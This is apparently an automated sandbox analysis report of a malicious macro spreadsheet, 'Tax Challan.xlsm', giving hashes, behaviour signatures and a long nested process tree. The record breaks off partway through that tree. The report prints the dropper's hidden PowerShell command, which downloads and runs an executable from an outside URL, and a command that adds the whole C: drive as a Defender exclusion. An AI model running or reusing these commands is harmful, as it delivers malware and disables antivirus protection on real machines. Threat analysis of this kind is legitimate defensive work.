Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    16-07-2020 07:55

General

  • Target

    Tax Challan.xlsm

  • Size

    88KB

  • MD5

    8927ad6be7ff24a708641467b7f699d5

  • SHA1

    9973dad26ac516f3a4f413624fa908a828e5df9b

  • SHA256

    5f005ef79f2a337aa3e3537f304316bdb931dffa3cecacadc1cd094c1414bf4f

  • SHA512

    fa5d459357e53bdf963126d3f0fa7fc840a6bb62448807f9ee8e38e65a58d0f9f00c0bdefcb0df3a6186843e80e9870df2c7ae455fbb623dfc92264e5dddea34

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://jurec.mx/doc.exe

Signatures

  • Program crash 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 813 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • JavaScript code in executable 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Drops startup file 59 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: MapViewOfSection 57 IoCs
  • Suspicious use of SetThreadContext 57 IoCs
  • Executes dropped EXE 171 IoCs
  • Modifies WinLogon 2 TTPs 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 2745 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Tax Challan.xlsm"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    • Checks processor information in registry
    • Suspicious use of SetWindowsHookEx
    PID:2804
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://jurec.mx/doc.exe',$env:Temp+'\LkAnJ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\LkAnJ.exe')
      2⤵
      • Suspicious use of WriteProcessMemory
      • Process spawned unexpected child process
      PID:3860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://jurec.mx/doc.exe',$env:Temp+'\LkAnJ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\LkAnJ.exe')
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        PID:3820
        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetThreadContext
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:3312
          • C:\Windows\SysWOW64\notepad.exe
            "C:\Windows\system32\notepad.exe"
            5⤵
            • Drops startup file
            PID:3832
          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
            5⤵
            • Adds Run key to start application
            • NTFS ADS
            • Suspicious use of WriteProcessMemory
            • Drops startup file
            • Executes dropped EXE
            PID:812
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Add-MpPreference -ExclusionPath C:\
              6⤵
                PID:2328
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 668
                  7⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1000
              • C:\ProgramData\images.exe
                "C:\ProgramData\images.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetThreadContext
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2220
                • C:\Windows\SysWOW64\notepad.exe
                  "C:\Windows\system32\notepad.exe"
                  7⤵
                  • Drops startup file
                  PID:3804
                • C:\ProgramData\images.exe
                  "C:\ProgramData\images.exe"
                  7⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  • Executes dropped EXE
                  • Modifies WinLogon
                  • Suspicious use of SetWindowsHookEx
                  PID:1836
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell Add-MpPreference -ExclusionPath C:\
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2208
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe"
                    8⤵
                      PID:3180
                  • C:\ProgramData\images.exe
                    "C:\ProgramData\images.exe" 2 1836 137671
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3640
              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 812 135046
                5⤵
                • Suspicious use of WriteProcessMemory
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:1072
                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetThreadContext
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3336
                  • C:\Windows\SysWOW64\notepad.exe
                    "C:\Windows\system32\notepad.exe"
                    7⤵
                    • Drops startup file
                    PID:728
                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:3880
                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3880 137921
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3136
                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetThreadContext
                      • Executes dropped EXE
                      PID:3484
                      • C:\Windows\SysWOW64\notepad.exe
                        "C:\Windows\system32\notepad.exe"
                        9⤵
                        • Drops startup file
                        PID:3084
                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:1872
                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1872 139625
                        9⤵
                        • Executes dropped EXE
                        PID:3356
                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                          10⤵
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetThreadContext
                          • Executes dropped EXE
                          PID:4120
                          • C:\Windows\SysWOW64\notepad.exe
                            "C:\Windows\system32\notepad.exe"
                            11⤵
                            • Drops startup file
                            PID:4168
                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                            11⤵
                            • Executes dropped EXE
                            PID:4184
                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4184 144375
                            11⤵
                            • Executes dropped EXE
                            PID:4224
                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                              12⤵
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetThreadContext
                              • Executes dropped EXE
                              PID:4400
                              • C:\Windows\SysWOW64\notepad.exe
                                "C:\Windows\system32\notepad.exe"
                                13⤵
                                • Drops startup file
                                PID:4428
                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                13⤵
                                • Executes dropped EXE
                                PID:4440
                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4440 151609
                                13⤵
                                • Executes dropped EXE
                                PID:4480
                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                  14⤵
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetThreadContext
                                  • Executes dropped EXE
                                  PID:4584
                                  • C:\Windows\SysWOW64\notepad.exe
                                    "C:\Windows\system32\notepad.exe"
                                    15⤵
                                    • Drops startup file
                                    PID:4616
                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                    15⤵
                                    • Executes dropped EXE
                                    PID:4628
                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4628 197484
                                    15⤵
                                    • Executes dropped EXE
                                    PID:4664
                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                      16⤵
                                      • Suspicious behavior: MapViewOfSection
                                      • Suspicious use of SetThreadContext
                                      • Executes dropped EXE
                                      PID:4708
                                      • C:\Windows\SysWOW64\notepad.exe
                                        "C:\Windows\system32\notepad.exe"
                                        17⤵
                                        • Drops startup file
                                        PID:4736
                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                        17⤵
                                        • Executes dropped EXE
                                        PID:4748
                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4748 198859
                                        17⤵
                                        • Executes dropped EXE
                                        PID:4776
                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                          18⤵
                                          • Suspicious behavior: MapViewOfSection
                                          • Suspicious use of SetThreadContext
                                          • Executes dropped EXE
                                          PID:4820
                                          • C:\Windows\SysWOW64\notepad.exe
                                            "C:\Windows\system32\notepad.exe"
                                            19⤵
                                            • Drops startup file
                                            PID:4848
                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                            19⤵
                                            • Executes dropped EXE
                                            PID:4860
                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4860 200390
                                            19⤵
                                            • Executes dropped EXE
                                            PID:4888
                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                              20⤵
                                              • Suspicious behavior: MapViewOfSection
                                              • Suspicious use of SetThreadContext
                                              • Executes dropped EXE
                                              PID:4928
                                              • C:\Windows\SysWOW64\notepad.exe
                                                "C:\Windows\system32\notepad.exe"
                                                21⤵
                                                • Drops startup file
                                                PID:4956
                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                21⤵
                                                • Executes dropped EXE
                                                PID:4968
                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4968 201843
                                                21⤵
                                                • Executes dropped EXE
                                                PID:5000
                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                  22⤵
                                                  • Suspicious behavior: MapViewOfSection
                                                  • Suspicious use of SetThreadContext
                                                  • Executes dropped EXE
                                                  PID:5040
                                                  • C:\Windows\SysWOW64\notepad.exe
                                                    "C:\Windows\system32\notepad.exe"
                                                    23⤵
                                                    • Drops startup file
                                                    PID:5068
                                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                    23⤵
                                                    • Executes dropped EXE
                                                    PID:5080
                                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 5080 203265
                                                    23⤵
                                                    • Executes dropped EXE
                                                    PID:5108
                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                      24⤵
                                                      • Suspicious behavior: MapViewOfSection
                                                      • Suspicious use of SetThreadContext
                                                      • Executes dropped EXE
                                                      PID:4112
                                                      • C:\Windows\SysWOW64\notepad.exe
                                                        "C:\Windows\system32\notepad.exe"
                                                        25⤵
                                                        • Drops startup file
                                                        PID:4144
                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                        25⤵
                                                        • Executes dropped EXE
                                                        PID:4196
                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4196 204671
                                                        25⤵
                                                        • Executes dropped EXE
                                                        PID:4172
                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                          26⤵
                                                          • Suspicious behavior: MapViewOfSection
                                                          • Suspicious use of SetThreadContext
                                                          • Executes dropped EXE
                                                          PID:4168
                                                          • C:\Windows\SysWOW64\notepad.exe
                                                            "C:\Windows\system32\notepad.exe"
                                                            27⤵
                                                            • Drops startup file
                                                            PID:4280
                                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                            27⤵
                                                            • Executes dropped EXE
                                                            PID:4296
                                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4296 205984
                                                            27⤵
                                                            • Executes dropped EXE
                                                            PID:4328
                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                              28⤵
                                                              • Suspicious behavior: MapViewOfSection
                                                              • Suspicious use of SetThreadContext
                                                              • Executes dropped EXE
                                                              PID:1544
                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                "C:\Windows\system32\notepad.exe"
                                                                29⤵
                                                                • Drops startup file
                                                                PID:3692
                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                29⤵
                                                                • Executes dropped EXE
                                                                PID:2264
                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2264 207453
                                                                29⤵
                                                                • Executes dropped EXE
                                                                PID:4188
                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                  30⤵
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  • Suspicious use of SetThreadContext
                                                                  • Executes dropped EXE
                                                                  PID:4456
                                                                  • C:\Windows\SysWOW64\notepad.exe
                                                                    "C:\Windows\system32\notepad.exe"
                                                                    31⤵
                                                                    • Drops startup file
                                                                    PID:4496
                                                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                    31⤵
                                                                    • Executes dropped EXE
                                                                    PID:4392
                                                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4392 208937
                                                                    31⤵
                                                                    • Executes dropped EXE
                                                                    PID:4060
                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                      32⤵
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      • Suspicious use of SetThreadContext
                                                                      • Executes dropped EXE
                                                                      PID:2768
                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                        "C:\Windows\system32\notepad.exe"
                                                                        33⤵
                                                                        • Drops startup file
                                                                        PID:3440
                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                        33⤵
                                                                        • Executes dropped EXE
                                                                        PID:632
                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 632 210375
                                                                        33⤵
                                                                        • Executes dropped EXE
                                                                        PID:1008
                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                          34⤵
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          • Suspicious use of SetThreadContext
                                                                          • Executes dropped EXE
                                                                          PID:3380
                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                            "C:\Windows\system32\notepad.exe"
                                                                            35⤵
                                                                            • Drops startup file
                                                                            PID:3576
                                                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                            35⤵
                                                                            • Executes dropped EXE
                                                                            PID:408
                                                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 408 211781
                                                                            35⤵
                                                                            • Executes dropped EXE
                                                                            PID:3880
                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                              36⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetThreadContext
                                                                              • Executes dropped EXE
                                                                              PID:2080
                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                "C:\Windows\system32\notepad.exe"
                                                                                37⤵
                                                                                • Drops startup file
                                                                                PID:3788
                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                37⤵
                                                                                • Executes dropped EXE
                                                                                PID:4472
                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4472 213281
                                                                                37⤵
                                                                                • Executes dropped EXE
                                                                                PID:4592
                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                  38⤵
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Executes dropped EXE
                                                                                  PID:4620
                                                                                  • C:\Windows\SysWOW64\notepad.exe
                                                                                    "C:\Windows\system32\notepad.exe"
                                                                                    39⤵
                                                                                    • Drops startup file
                                                                                    PID:4652
                                                                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                    39⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1728
                                                                                  • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1728 214703
                                                                                    39⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4692
                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                      40⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Executes dropped EXE
                                                                                      PID:4728
                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                        41⤵
                                                                                        • Drops startup file
                                                                                        PID:4800
                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                        41⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4804
                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4804 216140
                                                                                        41⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4808
                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                          42⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Executes dropped EXE
                                                                                          PID:4844
                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                            43⤵
                                                                                            • Drops startup file
                                                                                            PID:4896
                                                                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                            43⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4880
                                                                                          • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4880 217562
                                                                                            43⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4916
                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                              44⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Executes dropped EXE
                                                                                              PID:4932
                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                45⤵
                                                                                                • Drops startup file
                                                                                                PID:5008
                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                45⤵
                                                                                                  PID:5020
                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 5020 218937
                                                                                                  45⤵
                                                                                                    PID:1364
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                      46⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3668
                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                        47⤵
                                                                                                        • Drops startup file
                                                                                                        PID:4024
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                        47⤵
                                                                                                          PID:4996
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4996 220390
                                                                                                          47⤵
                                                                                                            PID:5004
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                              48⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5040
                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                49⤵
                                                                                                                • Drops startup file
                                                                                                                PID:5068
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                49⤵
                                                                                                                  PID:3644
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3644 221812
                                                                                                                  49⤵
                                                                                                                    PID:5108
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                      50⤵
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:4124
                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                        51⤵
                                                                                                                        • Drops startup file
                                                                                                                        PID:4140
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                        51⤵
                                                                                                                          PID:4180
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4180 223218
                                                                                                                          51⤵
                                                                                                                            PID:4264
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                              52⤵
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:4256
                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                53⤵
                                                                                                                                • Drops startup file
                                                                                                                                PID:4348
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                53⤵
                                                                                                                                  PID:820
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 820 224765
                                                                                                                                  53⤵
                                                                                                                                    PID:4356
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                      54⤵
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:3648
                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                        55⤵
                                                                                                                                        • Drops startup file
                                                                                                                                        PID:4004
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                        55⤵
                                                                                                                                          PID:3444
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3444 226140
                                                                                                                                          55⤵
                                                                                                                                            PID:4416
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                              56⤵
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:4188
                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                57⤵
                                                                                                                                                • Drops startup file
                                                                                                                                                PID:4428
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                57⤵
                                                                                                                                                  PID:1776
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1776 227546
                                                                                                                                                  57⤵
                                                                                                                                                    PID:1796
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                      58⤵
                                                                                                                                                      • Suspicious behavior: MapViewOfSection
